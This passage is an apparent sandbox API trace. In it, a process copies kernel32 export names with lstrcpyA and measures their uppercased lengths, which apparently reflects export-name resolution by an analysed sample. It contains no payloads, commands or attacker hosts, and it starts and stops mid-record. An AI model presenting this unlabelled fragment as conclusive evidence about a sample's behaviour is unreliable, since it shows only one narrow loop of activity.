returned="BasepAllocateActivationContextActivationBlock" [0185.493] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.493] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.494] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.494] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.494] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.494] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.494] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.494] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.494] lstrlenA (lpString="BEEP") returned 4 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.494] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.494] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.494] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.494] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.494] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.494] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.494] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.494] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.494] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.494] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.494] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.494] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.495] lstrlenA (lpString="CANCELIO") returned 8 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.495] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.495] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.495] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.495] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.495] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.495] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.495] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.495] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.495] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.495] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.495] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.495] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.495] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.495] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.495] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.495] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.495] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.495] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.495] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.496] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.496] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.496] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.496] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.496] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.496] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.496] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.496] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.496] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.496] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.496] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.496] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.496] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.496] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.496] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.496] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.496] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.496] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.496] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.496] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.497] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.497] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.497] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.497] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.497] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.497] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.497] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.497] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.497] lstrlenA (lpString="COPYFILEA") returned 9 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.497] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.497] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.497] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.497] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.497] lstrlenA (lpString="COPYFILEW") returned 9 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.497] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.497] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.497] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.497] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.497] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.497] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.498] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.498] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.498] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.498] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.498] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.498] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.498] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.498] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.498] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.498] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.498] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.498] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.498] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.498] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.498] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.498] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.498] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.498] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.498] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.498] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.499] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.499] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.499] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.499] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.499] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.499] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.499] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.499] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.499] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.499] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.499] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.499] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.499] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.499] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.499] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.499] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.499] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.499] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.499] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.499] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.500] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.500] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.500] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.500] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.500] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.500] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.500] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.500] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.500] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.500] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.500] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.500] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.500] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, 